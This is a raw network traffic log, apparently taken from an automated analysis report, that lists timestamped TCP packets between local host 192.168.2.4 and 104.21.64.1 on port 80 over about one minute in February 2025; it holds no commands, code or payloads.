                              Feb 20, 2025 03:43:41.920221090 CET8049751104.21.64.1192.168.2.4
                              Feb 20, 2025 03:43:43.071953058 CET4975280192.168.2.4104.21.64.1
                              Feb 20, 2025 03:43:43.078968048 CET8049752104.21.64.1192.168.2.4
                              Feb 20, 2025 03:43:43.082654953 CET4975280192.168.2.4104.21.64.1
                              Feb 20, 2025 03:43:43.085863113 CET4975280192.168.2.4104.21.64.1
                              Feb 20, 2025 03:43:43.092834949 CET8049752104.21.64.1192.168.2.4
                              Feb 20, 2025 03:43:43.094784021 CET4975280192.168.2.4104.21.64.1
                              Feb 20, 2025 03:43:43.101803064 CET8049752104.21.64.1192.168.2.4
                              Feb 20, 2025 03:43:43.907433033 CET8049752104.21.64.1192.168.2.4
                              Feb 20, 2025 03:43:43.907573938 CET4975280192.168.2.4104.21.64.1
                              Feb 20, 2025 03:43:43.908482075 CET8049752104.21.64.1192.168.2.4
                              Feb 20, 2025 03:43:43.908523083 CET4975280192.168.2.4104.21.64.1
                              Feb 20, 2025 03:43:43.912590027 CET8049752104.21.64.1192.168.2.4
                              Feb 20, 2025 03:43:45.090369940 CET4975380192.168.2.4104.21.64.1
                              Feb 20, 2025 03:43:45.095470905 CET8049753104.21.64.1192.168.2.4
                              Feb 20, 2025 03:43:45.095539093 CET4975380192.168.2.4104.21.64.1
                              Feb 20, 2025 03:43:45.097601891 CET4975380192.168.2.4104.21.64.1
                              Feb 20, 2025 03:43:45.102668047 CET8049753104.21.64.1192.168.2.4
                              Feb 20, 2025 03:43:45.102722883 CET4975380192.168.2.4104.21.64.1
                              Feb 20, 2025 03:43:45.107729912 CET8049753104.21.64.1192.168.2.4
                              Feb 20, 2025 03:43:45.838972092 CET8049753104.21.64.1192.168.2.4
                              Feb 20, 2025 03:43:45.839242935 CET4975380192.168.2.4104.21.64.1
                              Feb 20, 2025 03:43:45.839556932 CET8049753104.21.64.1192.168.2.4
                              Feb 20, 2025 03:43:45.839623928 CET4975380192.168.2.4104.21.64.1
                              Feb 20, 2025 03:43:45.844263077 CET8049753104.21.64.1192.168.2.4
                              Feb 20, 2025 03:43:46.982934952 CET4975480192.168.2.4104.21.64.1
                              Feb 20, 2025 03:43:46.989191055 CET8049754104.21.64.1192.168.2.4
                              Feb 20, 2025 03:43:46.989281893 CET4975480192.168.2.4104.21.64.1
                              Feb 20, 2025 03:43:46.991051912 CET4975480192.168.2.4104.21.64.1
                              Feb 20, 2025 03:43:46.997163057 CET8049754104.21.64.1192.168.2.4
                              Feb 20, 2025 03:43:46.997245073 CET4975480192.168.2.4104.21.64.1
                              Feb 20, 2025 03:43:47.003268957 CET8049754104.21.64.1192.168.2.4
                              Feb 20, 2025 03:43:47.712637901 CET8049754104.21.64.1192.168.2.4
                              Feb 20, 2025 03:43:47.712754011 CET4975480192.168.2.4104.21.64.1
                              Feb 20, 2025 03:43:47.713078976 CET8049754104.21.64.1192.168.2.4
                              Feb 20, 2025 03:43:47.713154078 CET4975480192.168.2.4104.21.64.1
                              Feb 20, 2025 03:43:47.717725992 CET8049754104.21.64.1192.168.2.4
                              Feb 20, 2025 03:43:48.850588083 CET4975580192.168.2.4104.21.64.1
                              Feb 20, 2025 03:43:48.857314110 CET8049755104.21.64.1192.168.2.4
                              Feb 20, 2025 03:43:48.857386112 CET4975580192.168.2.4104.21.64.1
                              Feb 20, 2025 03:43:48.859348059 CET4975580192.168.2.4104.21.64.1
                              Feb 20, 2025 03:43:48.866208076 CET8049755104.21.64.1192.168.2.4
                              Feb 20, 2025 03:43:48.866259098 CET4975580192.168.2.4104.21.64.1
                              Feb 20, 2025 03:43:48.873116970 CET8049755104.21.64.1192.168.2.4
                              Feb 20, 2025 03:43:49.660723925 CET8049755104.21.64.1192.168.2.4
                              Feb 20, 2025 03:43:49.660952091 CET4975580192.168.2.4104.21.64.1
                              Feb 20, 2025 03:43:49.661859989 CET8049755104.21.64.1192.168.2.4
                              Feb 20, 2025 03:43:49.661914110 CET4975580192.168.2.4104.21.64.1
                              Feb 20, 2025 03:43:49.667999029 CET8049755104.21.64.1192.168.2.4
                              Feb 20, 2025 03:43:50.803113937 CET4975680192.168.2.4104.21.64.1
                              Feb 20, 2025 03:43:50.810252905 CET8049756104.21.64.1192.168.2.4
                              Feb 20, 2025 03:43:50.810343027 CET4975680192.168.2.4104.21.64.1
                              Feb 20, 2025 03:43:50.812558889 CET4975680192.168.2.4104.21.64.1
                              Feb 20, 2025 03:43:50.819837093 CET8049756104.21.64.1192.168.2.4
                              Feb 20, 2025 03:43:50.820013046 CET4975680192.168.2.4104.21.64.1
                              Feb 20, 2025 03:43:50.826107979 CET8049756104.21.64.1192.168.2.4
                              Feb 20, 2025 03:43:51.567676067 CET8049756104.21.64.1192.168.2.4
                              Feb 20, 2025 03:43:51.567801952 CET4975680192.168.2.4104.21.64.1
                              Feb 20, 2025 03:43:51.568017960 CET8049756104.21.64.1192.168.2.4
                              Feb 20, 2025 03:43:51.568070889 CET4975680192.168.2.4104.21.64.1
                              Feb 20, 2025 03:43:51.573697090 CET8049756104.21.64.1192.168.2.4
                              Feb 20, 2025 03:43:52.709480047 CET4975780192.168.2.4104.21.64.1
                              Feb 20, 2025 03:43:52.714760065 CET8049757104.21.64.1192.168.2.4
                              Feb 20, 2025 03:43:52.714834929 CET4975780192.168.2.4104.21.64.1
                              Feb 20, 2025 03:43:52.716670990 CET4975780192.168.2.4104.21.64.1
                              Feb 20, 2025 03:43:52.721688032 CET8049757104.21.64.1192.168.2.4
                              Feb 20, 2025 03:43:52.721740961 CET4975780192.168.2.4104.21.64.1
                              Feb 20, 2025 03:43:52.726766109 CET8049757104.21.64.1192.168.2.4
                              Feb 20, 2025 03:43:53.545025110 CET8049757104.21.64.1192.168.2.4
                              Feb 20, 2025 03:43:53.545130968 CET4975780192.168.2.4104.21.64.1
                              Feb 20, 2025 03:43:53.545607090 CET8049757104.21.64.1192.168.2.4
                              Feb 20, 2025 03:43:53.545715094 CET4975780192.168.2.4104.21.64.1
                              Feb 20, 2025 03:43:53.550247908 CET8049757104.21.64.1192.168.2.4
                              Feb 20, 2025 03:43:54.679311037 CET4975880192.168.2.4104.21.64.1
                              Feb 20, 2025 03:43:54.685576916 CET8049758104.21.64.1192.168.2.4
                              Feb 20, 2025 03:43:54.685664892 CET4975880192.168.2.4104.21.64.1
                              Feb 20, 2025 03:43:54.687501907 CET4975880192.168.2.4104.21.64.1
                              Feb 20, 2025 03:43:54.693295956 CET8049758104.21.64.1192.168.2.4
                              Feb 20, 2025 03:43:54.693351030 CET4975880192.168.2.4104.21.64.1
                              Feb 20, 2025 03:43:54.700922012 CET8049758104.21.64.1192.168.2.4
                              Feb 20, 2025 03:43:55.482131958 CET8049758104.21.64.1192.168.2.4
                              Feb 20, 2025 03:43:55.482261896 CET4975880192.168.2.4104.21.64.1
                              Feb 20, 2025 03:43:55.482913017 CET8049758104.21.64.1192.168.2.4
                              Feb 20, 2025 03:43:55.482965946 CET4975880192.168.2.4104.21.64.1
                              Feb 20, 2025 03:43:55.488426924 CET8049758104.21.64.1192.168.2.4
                              Feb 20, 2025 03:43:56.643157959 CET4975980192.168.2.4104.21.64.1
                              Feb 20, 2025 03:43:56.648370981 CET8049759104.21.64.1192.168.2.4
                              Feb 20, 2025 03:43:56.650684118 CET4975980192.168.2.4104.21.64.1
                              Feb 20, 2025 03:43:56.653667927 CET4975980192.168.2.4104.21.64.1
                              Feb 20, 2025 03:43:56.660065889 CET8049759104.21.64.1192.168.2.4
                              Feb 20, 2025 03:43:56.661304951 CET4975980192.168.2.4104.21.64.1
                              Feb 20, 2025 03:43:56.666481972 CET8049759104.21.64.1192.168.2.4
                              Feb 20, 2025 03:43:57.403055906 CET8049759104.21.64.1192.168.2.4
                              Feb 20, 2025 03:43:57.403204918 CET4975980192.168.2.4104.21.64.1
                              Feb 20, 2025 03:43:57.403400898 CET8049759104.21.64.1192.168.2.4
                              Feb 20, 2025 03:43:57.403481007 CET4975980192.168.2.4104.21.64.1
                              Feb 20, 2025 03:43:57.408242941 CET8049759104.21.64.1192.168.2.4
                              Feb 20, 2025 03:43:58.692567110 CET4976080192.168.2.4104.21.64.1
                              Feb 20, 2025 03:43:58.697757006 CET8049760104.21.64.1192.168.2.4
                              Feb 20, 2025 03:43:58.697813034 CET4976080192.168.2.4104.21.64.1
                              Feb 20, 2025 03:43:58.700609922 CET4976080192.168.2.4104.21.64.1
                              Feb 20, 2025 03:43:58.705652952 CET8049760104.21.64.1192.168.2.4
                              Feb 20, 2025 03:43:58.705694914 CET4976080192.168.2.4104.21.64.1
                              Feb 20, 2025 03:43:58.710659027 CET8049760104.21.64.1192.168.2.4
                              Feb 20, 2025 03:43:59.467822075 CET8049760104.21.64.1192.168.2.4
                              Feb 20, 2025 03:43:59.467932940 CET4976080192.168.2.4104.21.64.1
                              Feb 20, 2025 03:43:59.468637943 CET8049760104.21.64.1192.168.2.4
                              Feb 20, 2025 03:43:59.468717098 CET4976080192.168.2.4104.21.64.1
                              Feb 20, 2025 03:43:59.472980976 CET8049760104.21.64.1192.168.2.4
                              Feb 20, 2025 03:44:00.616983891 CET4976180192.168.2.4104.21.64.1
                              Feb 20, 2025 03:44:00.623682022 CET8049761104.21.64.1192.168.2.4
                              Feb 20, 2025 03:44:00.623759985 CET4976180192.168.2.4104.21.64.1
                              Feb 20, 2025 03:44:00.625502110 CET4976180192.168.2.4104.21.64.1
                              Feb 20, 2025 03:44:00.632122040 CET8049761104.21.64.1192.168.2.4
                              Feb 20, 2025 03:44:00.632178068 CET4976180192.168.2.4104.21.64.1
                              Feb 20, 2025 03:44:00.638731003 CET8049761104.21.64.1192.168.2.4
                              Feb 20, 2025 03:44:01.394223928 CET8049761104.21.64.1192.168.2.4
                              Feb 20, 2025 03:44:01.394606113 CET4976180192.168.2.4104.21.64.1
                              Feb 20, 2025 03:44:01.395112038 CET8049761104.21.64.1192.168.2.4
                              Feb 20, 2025 03:44:01.395246029 CET4976180192.168.2.4104.21.64.1
                              Feb 20, 2025 03:44:01.399671078 CET8049761104.21.64.1192.168.2.4
                              Feb 20, 2025 03:44:02.537031889 CET4976280192.168.2.4104.21.64.1
                              Feb 20, 2025 03:44:02.542150974 CET8049762104.21.64.1192.168.2.4
                              Feb 20, 2025 03:44:02.542227030 CET4976280192.168.2.4104.21.64.1
                              Feb 20, 2025 03:44:02.543962955 CET4976280192.168.2.4104.21.64.1
                              Feb 20, 2025 03:44:02.548974991 CET8049762104.21.64.1192.168.2.4
                              Feb 20, 2025 03:44:02.549015999 CET4976280192.168.2.4104.21.64.1
                              Feb 20, 2025 03:44:02.553988934 CET8049762104.21.64.1192.168.2.4
                              Feb 20, 2025 03:44:03.203638077 CET8049762104.21.64.1192.168.2.4
                              Feb 20, 2025 03:44:03.203757048 CET4976280192.168.2.4104.21.64.1
                              Feb 20, 2025 03:44:03.206147909 CET8049762104.21.64.1192.168.2.4
                              Feb 20, 2025 03:44:03.206203938 CET4976280192.168.2.4104.21.64.1
                              Feb 20, 2025 03:44:03.208739996 CET8049762104.21.64.1192.168.2.4
                              Feb 20, 2025 03:44:04.336026907 CET4976380192.168.2.4104.21.64.1
                              Feb 20, 2025 03:44:04.341181040 CET8049763104.21.64.1192.168.2.4
                              Feb 20, 2025 03:44:04.341250896 CET4976380192.168.2.4104.21.64.1
                              Feb 20, 2025 03:44:04.343209028 CET4976380192.168.2.4104.21.64.1
                              Feb 20, 2025 03:44:04.348192930 CET8049763104.21.64.1192.168.2.4
                              Feb 20, 2025 03:44:04.348268986 CET4976380192.168.2.4104.21.64.1
                              Feb 20, 2025 03:44:04.353270054 CET8049763104.21.64.1192.168.2.4
                              Feb 20, 2025 03:44:05.170475960 CET8049763104.21.64.1192.168.2.4
                              Feb 20, 2025 03:44:05.170717955 CET4976380192.168.2.4104.21.64.1
                              Feb 20, 2025 03:44:05.171680927 CET8049763104.21.64.1192.168.2.4
                              Feb 20, 2025 03:44:05.171741962 CET4976380192.168.2.4104.21.64.1
                              Feb 20, 2025 03:44:05.175755024 CET8049763104.21.64.1192.168.2.4
                              Feb 20, 2025 03:44:06.324538946 CET4976480192.168.2.4104.21.64.1
                              Feb 20, 2025 03:44:06.329794884 CET8049764104.21.64.1192.168.2.4
                              Feb 20, 2025 03:44:06.329929113 CET4976480192.168.2.4104.21.64.1
                              Feb 20, 2025 03:44:06.332422018 CET4976480192.168.2.4104.21.64.1
                              Feb 20, 2025 03:44:06.337491989 CET8049764104.21.64.1192.168.2.4
                              Feb 20, 2025 03:44:06.337593079 CET4976480192.168.2.4104.21.64.1
                              Feb 20, 2025 03:44:06.342581987 CET8049764104.21.64.1192.168.2.4
                              Feb 20, 2025 03:44:07.123472929 CET8049764104.21.64.1192.168.2.4
                              Feb 20, 2025 03:44:07.123723030 CET4976480192.168.2.4104.21.64.1
                              Feb 20, 2025 03:44:07.123982906 CET8049764104.21.64.1192.168.2.4
                              Feb 20, 2025 03:44:07.124043941 CET4976480192.168.2.4104.21.64.1
                              Feb 20, 2025 03:44:07.128756046 CET8049764104.21.64.1192.168.2.4
                              Feb 20, 2025 03:44:08.278520107 CET4976680192.168.2.4104.21.64.1
                              Feb 20, 2025 03:44:08.283663034 CET8049766104.21.64.1192.168.2.4
                              Feb 20, 2025 03:44:08.283873081 CET4976680192.168.2.4104.21.64.1
                              Feb 20, 2025 03:44:08.285682917 CET4976680192.168.2.4104.21.64.1
                              Feb 20, 2025 03:44:08.290653944 CET8049766104.21.64.1192.168.2.4
                              Feb 20, 2025 03:44:08.290721893 CET4976680192.168.2.4104.21.64.1
                              Feb 20, 2025 03:44:08.295722961 CET8049766104.21.64.1192.168.2.4
                              Feb 20, 2025 03:44:09.168638945 CET8049766104.21.64.1192.168.2.4
                              Feb 20, 2025 03:44:09.168849945 CET4976680192.168.2.4104.21.64.1
                              Feb 20, 2025 03:44:09.169111013 CET8049766104.21.64.1192.168.2.4
                              Feb 20, 2025 03:44:09.169847965 CET4976680192.168.2.4104.21.64.1
                              Feb 20, 2025 03:44:09.173953056 CET8049766104.21.64.1192.168.2.4
                              Feb 20, 2025 03:44:10.304547071 CET4976880192.168.2.4104.21.64.1
                              Feb 20, 2025 03:44:10.309679985 CET8049768104.21.64.1192.168.2.4
                              Feb 20, 2025 03:44:10.309794903 CET4976880192.168.2.4104.21.64.1
                              Feb 20, 2025 03:44:10.311546087 CET4976880192.168.2.4104.21.64.1
                              Feb 20, 2025 03:44:10.316589117 CET8049768104.21.64.1192.168.2.4
                              Feb 20, 2025 03:44:10.316672087 CET4976880192.168.2.4104.21.64.1
                              Feb 20, 2025 03:44:10.321664095 CET8049768104.21.64.1192.168.2.4
                              Feb 20, 2025 03:44:11.054193974 CET8049768104.21.64.1192.168.2.4
                              Feb 20, 2025 03:44:11.054295063 CET4976880192.168.2.4104.21.64.1
                              Feb 20, 2025 03:44:11.054579020 CET8049768104.21.64.1192.168.2.4
                              Feb 20, 2025 03:44:11.054635048 CET4976880192.168.2.4104.21.64.1
                              Feb 20, 2025 03:44:11.059393883 CET8049768104.21.64.1192.168.2.4
                              Feb 20, 2025 03:44:12.203788042 CET4977980192.168.2.4104.21.64.1
                              Feb 20, 2025 03:44:12.209014893 CET8049779104.21.64.1192.168.2.4
                              Feb 20, 2025 03:44:12.209108114 CET4977980192.168.2.4104.21.64.1
                              Feb 20, 2025 03:44:12.211334944 CET4977980192.168.2.4104.21.64.1
                              Feb 20, 2025 03:44:12.216310024 CET8049779104.21.64.1192.168.2.4
                              Feb 20, 2025 03:44:12.216352940 CET4977980192.168.2.4104.21.64.1
                              Feb 20, 2025 03:44:12.221415997 CET8049779104.21.64.1192.168.2.4
                              Feb 20, 2025 03:44:13.092571974 CET8049779104.21.64.1192.168.2.4
                              Feb 20, 2025 03:44:13.092683077 CET4977980192.168.2.4104.21.64.1
                              Feb 20, 2025 03:44:13.093388081 CET8049779104.21.64.1192.168.2.4
                              Feb 20, 2025 03:44:13.093441010 CET4977980192.168.2.4104.21.64.1
                              Feb 20, 2025 03:44:13.099060059 CET8049779104.21.64.1192.168.2.4
                              Feb 20, 2025 03:44:14.244458914 CET4979380192.168.2.4104.21.64.1
                              Feb 20, 2025 03:44:14.249562025 CET8049793104.21.64.1192.168.2.4
                              Feb 20, 2025 03:44:14.250744104 CET4979380192.168.2.4104.21.64.1
                              Feb 20, 2025 03:44:14.252463102 CET4979380192.168.2.4104.21.64.1
                              Feb 20, 2025 03:44:14.257539034 CET8049793104.21.64.1192.168.2.4
                              Feb 20, 2025 03:44:14.257584095 CET4979380192.168.2.4104.21.64.1
                              Feb 20, 2025 03:44:14.262612104 CET8049793104.21.64.1192.168.2.4
                              Feb 20, 2025 03:44:15.060792923 CET8049793104.21.64.1192.168.2.4
                              Feb 20, 2025 03:44:15.060888052 CET4979380192.168.2.4104.21.64.1
                              Feb 20, 2025 03:44:15.061045885 CET8049793104.21.64.1192.168.2.4
                              Feb 20, 2025 03:44:15.061105967 CET4979380192.168.2.4104.21.64.1
                              Feb 20, 2025 03:44:15.066840887 CET8049793104.21.64.1192.168.2.4
                              Feb 20, 2025 03:44:16.225214958 CET4980680192.168.2.4104.21.64.1
                              Feb 20, 2025 03:44:16.230372906 CET8049806104.21.64.1192.168.2.4
                              Feb 20, 2025 03:44:16.230448961 CET4980680192.168.2.4104.21.64.1
                              Feb 20, 2025 03:44:16.232182026 CET4980680192.168.2.4104.21.64.1
                              Feb 20, 2025 03:44:16.237139940 CET8049806104.21.64.1192.168.2.4
                              Feb 20, 2025 03:44:16.237190008 CET4980680192.168.2.4104.21.64.1
                              Feb 20, 2025 03:44:16.242496014 CET8049806104.21.64.1192.168.2.4
                              Feb 20, 2025 03:44:17.017465115 CET8049806104.21.64.1192.168.2.4
                              Feb 20, 2025 03:44:17.017875910 CET4980680192.168.2.4104.21.64.1
                              Feb 20, 2025 03:44:17.018348932 CET8049806104.21.64.1192.168.2.4
                              Feb 20, 2025 03:44:17.018413067 CET4980680192.168.2.4104.21.64.1
                              Feb 20, 2025 03:44:17.022996902 CET8049806104.21.64.1192.168.2.4
                              Feb 20, 2025 03:44:18.167665958 CET4981980192.168.2.4104.21.64.1
                              Feb 20, 2025 03:44:18.172710896 CET8049819104.21.64.1192.168.2.4
                              Feb 20, 2025 03:44:18.172801971 CET4981980192.168.2.4104.21.64.1
                              Feb 20, 2025 03:44:18.175738096 CET4981980192.168.2.4104.21.64.1
                              Feb 20, 2025 03:44:18.180736065 CET8049819104.21.64.1192.168.2.4
                              Feb 20, 2025 03:44:18.180783033 CET4981980192.168.2.4104.21.64.1
                              Feb 20, 2025 03:44:18.185780048 CET8049819104.21.64.1192.168.2.4
                              Feb 20, 2025 03:44:18.948215008 CET8049819104.21.64.1192.168.2.4
                              Feb 20, 2025 03:44:18.948385954 CET4981980192.168.2.4104.21.64.1
                              Feb 20, 2025 03:44:18.949486971 CET8049819104.21.64.1192.168.2.4
                              Feb 20, 2025 03:44:18.949531078 CET4981980192.168.2.4104.21.64.1
                              Feb 20, 2025 03:44:18.954293966 CET8049819104.21.64.1192.168.2.4
                              Feb 20, 2025 03:44:20.100064993 CET4982980192.168.2.4104.21.64.1
                              Feb 20, 2025 03:44:20.105267048 CET8049829104.21.64.1192.168.2.4
                              Feb 20, 2025 03:44:20.108989000 CET4982980192.168.2.4104.21.64.1
                              Feb 20, 2025 03:44:20.110713005 CET4982980192.168.2.4104.21.64.1
                              Feb 20, 2025 03:44:20.115772963 CET8049829104.21.64.1192.168.2.4
                              Feb 20, 2025 03:44:20.117513895 CET4982980192.168.2.4104.21.64.1
                              Feb 20, 2025 03:44:20.122565031 CET8049829104.21.64.1192.168.2.4
                              Feb 20, 2025 03:44:20.910202980 CET8049829104.21.64.1192.168.2.4
                              Feb 20, 2025 03:44:20.910586119 CET8049829104.21.64.1192.168.2.4
                              Feb 20, 2025 03:44:20.910589933 CET4982980192.168.2.4104.21.64.1
                              Feb 20, 2025 03:44:20.910681009 CET4982980192.168.2.4104.21.64.1
                              Feb 20, 2025 03:44:20.915777922 CET8049829104.21.64.1192.168.2.4
                              Feb 20, 2025 03:44:22.067795992 CET4984080192.168.2.4104.21.64.1
                              Feb 20, 2025 03:44:22.072905064 CET8049840104.21.64.1192.168.2.4
                              Feb 20, 2025 03:44:22.073009014 CET4984080192.168.2.4104.21.64.1
                              Feb 20, 2025 03:44:22.074762106 CET4984080192.168.2.4104.21.64.1
                              Feb 20, 2025 03:44:22.079927921 CET8049840104.21.64.1192.168.2.4
                              Feb 20, 2025 03:44:22.080002069 CET4984080192.168.2.4104.21.64.1
                              Feb 20, 2025 03:44:22.085092068 CET8049840104.21.64.1192.168.2.4
                              Feb 20, 2025 03:44:22.852338076 CET8049840104.21.64.1192.168.2.4
                              Feb 20, 2025 03:44:22.852440119 CET4984080192.168.2.4104.21.64.1
                              Feb 20, 2025 03:44:22.852443933 CET8049840104.21.64.1192.168.2.4
                              Feb 20, 2025 03:44:22.852547884 CET4984080192.168.2.4104.21.64.1
                              Feb 20, 2025 03:44:22.857460022 CET8049840104.21.64.1192.168.2.4
                              Feb 20, 2025 03:44:23.992754936 CET4985480192.168.2.4104.21.64.1
                              Feb 20, 2025 03:44:23.997817039 CET8049854104.21.64.1192.168.2.4
                              Feb 20, 2025 03:44:23.997884989 CET4985480192.168.2.4104.21.64.1
                              Feb 20, 2025 03:44:24.000293016 CET4985480192.168.2.4104.21.64.1
                              Feb 20, 2025 03:44:24.005387068 CET8049854104.21.64.1192.168.2.4
                              Feb 20, 2025 03:44:24.005440950 CET4985480192.168.2.4104.21.64.1
                              Feb 20, 2025 03:44:24.010552883 CET8049854104.21.64.1192.168.2.4
                              Feb 20, 2025 03:44:24.819494963 CET8049854104.21.64.1192.168.2.4
                              Feb 20, 2025 03:44:24.819766045 CET8049854104.21.64.1192.168.2.4
                              Feb 20, 2025 03:44:24.819833994 CET4985480192.168.2.4104.21.64.1
                              Feb 20, 2025 03:44:24.819834948 CET4985480192.168.2.4104.21.64.1
                              Feb 20, 2025 03:44:24.824961901 CET8049854104.21.64.1192.168.2.4
                              Feb 20, 2025 03:44:25.973829031 CET4986880192.168.2.4104.21.64.1
                              Feb 20, 2025 03:44:25.978925943 CET8049868104.21.64.1192.168.2.4
                              Feb 20, 2025 03:44:25.978996038 CET4986880192.168.2.4104.21.64.1
                              Feb 20, 2025 03:44:25.980731010 CET4986880192.168.2.4104.21.64.1
                              Feb 20, 2025 03:44:25.986779928 CET8049868104.21.64.1192.168.2.4
                              Feb 20, 2025 03:44:25.986831903 CET4986880192.168.2.4104.21.64.1
                              Feb 20, 2025 03:44:25.992993116 CET8049868104.21.64.1192.168.2.4
                              Feb 20, 2025 03:44:26.634171009 CET8049868104.21.64.1192.168.2.4
                              Feb 20, 2025 03:44:26.634314060 CET4986880192.168.2.4104.21.64.1
                              Feb 20, 2025 03:44:26.634809017 CET8049868104.21.64.1192.168.2.4
                              Feb 20, 2025 03:44:26.634867907 CET4986880192.168.2.4104.21.64.1
                              Feb 20, 2025 03:44:26.639425039 CET8049868104.21.64.1192.168.2.4
                              Feb 20, 2025 03:44:27.773267031 CET4988180192.168.2.4104.21.64.1
                              Feb 20, 2025 03:44:27.778352022 CET8049881104.21.64.1192.168.2.4
                              Feb 20, 2025 03:44:27.778445959 CET4988180192.168.2.4104.21.64.1
                              Feb 20, 2025 03:44:27.780179024 CET4988180192.168.2.4104.21.64.1
                              Feb 20, 2025 03:44:27.785200119 CET8049881104.21.64.1192.168.2.4
                              Feb 20, 2025 03:44:27.785264015 CET4988180192.168.2.4104.21.64.1
                              Feb 20, 2025 03:44:27.790318012 CET8049881104.21.64.1192.168.2.4
                              Feb 20, 2025 03:44:28.528862953 CET8049881104.21.64.1192.168.2.4
                              Feb 20, 2025 03:44:28.529010057 CET4988180192.168.2.4104.21.64.1
                              Feb 20, 2025 03:44:28.529839993 CET8049881104.21.64.1192.168.2.4
                              Feb 20, 2025 03:44:28.529906988 CET4988180192.168.2.4104.21.64.1
                              Feb 20, 2025 03:44:28.534085989 CET8049881104.21.64.1192.168.2.4
                              Feb 20, 2025 03:44:29.663084030 CET4989280192.168.2.4104.21.64.1
                              Feb 20, 2025 03:44:29.668252945 CET8049892104.21.64.1192.168.2.4
                              Feb 20, 2025 03:44:29.668344021 CET4989280192.168.2.4104.21.64.1
                              Feb 20, 2025 03:44:29.670077085 CET4989280192.168.2.4104.21.64.1
                              Feb 20, 2025 03:44:29.675196886 CET8049892104.21.64.1192.168.2.4
                              Feb 20, 2025 03:44:29.675257921 CET4989280192.168.2.4104.21.64.1
                              Feb 20, 2025 03:44:29.680320978 CET8049892104.21.64.1192.168.2.4
                              Feb 20, 2025 03:44:30.431359053 CET8049892104.21.64.1192.168.2.4
                              Feb 20, 2025 03:44:30.432185888 CET8049892104.21.64.1192.168.2.4
                              Feb 20, 2025 03:44:30.432255983 CET4989280192.168.2.4104.21.64.1
                              Feb 20, 2025 03:44:30.438566923 CET4989280192.168.2.4104.21.64.1
                              Feb 20, 2025 03:44:30.443763018 CET8049892104.21.64.1192.168.2.4
                              Feb 20, 2025 03:44:31.752507925 CET4990880192.168.2.4104.21.64.1
                              Feb 20, 2025 03:44:31.757873058 CET8049908104.21.64.1192.168.2.4
                              Feb 20, 2025 03:44:31.758806944 CET4990880192.168.2.4104.21.64.1
                              Feb 20, 2025 03:44:31.760562897 CET4990880192.168.2.4104.21.64.1
                              Feb 20, 2025 03:44:31.765650034 CET8049908104.21.64.1192.168.2.4
                              Feb 20, 2025 03:44:31.765736103 CET4990880192.168.2.4104.21.64.1
                              Feb 20, 2025 03:44:31.770921946 CET8049908104.21.64.1192.168.2.4
                              Feb 20, 2025 03:44:32.663177967 CET8049908104.21.64.1192.168.2.4
                              Feb 20, 2025 03:44:32.663290977 CET4990880192.168.2.4104.21.64.1
                              Feb 20, 2025 03:44:32.664463043 CET8049908104.21.64.1192.168.2.4
                              Feb 20, 2025 03:44:32.664778948 CET4990880192.168.2.4104.21.64.1
                              Feb 20, 2025 03:44:32.668380976 CET8049908104.21.64.1192.168.2.4
                              Feb 20, 2025 03:44:33.821858883 CET4992280192.168.2.4104.21.64.1
                              Feb 20, 2025 03:44:33.827024937 CET8049922104.21.64.1192.168.2.4
                              Feb 20, 2025 03:44:33.827148914 CET4992280192.168.2.4104.21.64.1
                              Feb 20, 2025 03:44:33.828871012 CET4992280192.168.2.4104.21.64.1
                              Feb 20, 2025 03:44:33.834100962 CET8049922104.21.64.1192.168.2.4
                              Feb 20, 2025 03:44:33.834170103 CET4992280192.168.2.4104.21.64.1
                              Feb 20, 2025 03:44:33.839224100 CET8049922104.21.64.1192.168.2.4
                              Feb 20, 2025 03:44:34.661083937 CET8049922104.21.64.1192.168.2.4
                              Feb 20, 2025 03:44:34.661211014 CET4992280192.168.2.4104.21.64.1
                              Feb 20, 2025 03:44:34.661756992 CET8049922104.21.64.1192.168.2.4
                              Feb 20, 2025 03:44:34.661808014 CET4992280192.168.2.4104.21.64.1
                              Feb 20, 2025 03:44:34.666251898 CET8049922104.21.64.1192.168.2.4
                              Feb 20, 2025 03:44:35.809420109 CET4993480192.168.2.4104.21.64.1
                              Feb 20, 2025 03:44:35.814973116 CET8049934104.21.64.1192.168.2.4
                              Feb 20, 2025 03:44:35.815040112 CET4993480192.168.2.4104.21.64.1
                              Feb 20, 2025 03:44:35.816777945 CET4993480192.168.2.4104.21.64.1
                              Feb 20, 2025 03:44:35.821729898 CET8049934104.21.64.1192.168.2.4
                              Feb 20, 2025 03:44:35.821784973 CET4993480192.168.2.4104.21.64.1
                              Feb 20, 2025 03:44:35.826771975 CET8049934104.21.64.1192.168.2.4
                              Feb 20, 2025 03:44:36.566781044 CET8049934104.21.64.1192.168.2.4
                              Feb 20, 2025 03:44:36.566884041 CET4993480192.168.2.4104.21.64.1
                              Feb 20, 2025 03:44:36.567120075 CET8049934104.21.64.1192.168.2.4
                              Feb 20, 2025 03:44:36.567157030 CET4993480192.168.2.4104.21.64.1
                              Feb 20, 2025 03:44:36.571862936 CET8049934104.21.64.1192.168.2.4
                              Feb 20, 2025 03:44:37.726314068 CET4994680192.168.2.4104.21.64.1
                              Feb 20, 2025 03:44:37.731537104 CET8049946104.21.64.1192.168.2.4
                              Feb 20, 2025 03:44:37.731621981 CET4994680192.168.2.4104.21.64.1
                              Feb 20, 2025 03:44:37.733357906 CET4994680192.168.2.4104.21.64.1
                              Feb 20, 2025 03:44:37.738429070 CET8049946104.21.64.1192.168.2.4
                              Feb 20, 2025 03:44:37.738492012 CET4994680192.168.2.4104.21.64.1
                              Feb 20, 2025 03:44:37.743565083 CET8049946104.21.64.1192.168.2.4
                              Feb 20, 2025 03:44:38.559964895 CET8049946104.21.64.1192.168.2.4
                              Feb 20, 2025 03:44:38.560384035 CET4994680192.168.2.4104.21.64.1
                              Feb 20, 2025 03:44:38.561394930 CET8049946104.21.64.1192.168.2.4
                              Feb 20, 2025 03:44:38.561562061 CET4994680192.168.2.4104.21.64.1
                              Feb 20, 2025 03:44:38.565397978 CET8049946104.21.64.1192.168.2.4
                              Feb 20, 2025 03:44:39.710850954 CET4995880192.168.2.4104.21.64.1
                              Feb 20, 2025 03:44:39.715945959 CET8049958104.21.64.1192.168.2.4
                              Feb 20, 2025 03:44:39.716037989 CET4995880192.168.2.4104.21.64.1
                              Feb 20, 2025 03:44:39.717734098 CET4995880192.168.2.4104.21.64.1
                              Feb 20, 2025 03:44:39.722753048 CET8049958104.21.64.1192.168.2.4
                              Feb 20, 2025 03:44:39.722811937 CET4995880192.168.2.4104.21.64.1
                              Feb 20, 2025 03:44:39.728333950 CET8049958104.21.64.1192.168.2.4
                              Feb 20, 2025 03:44:40.528428078 CET8049958104.21.64.1192.168.2.4
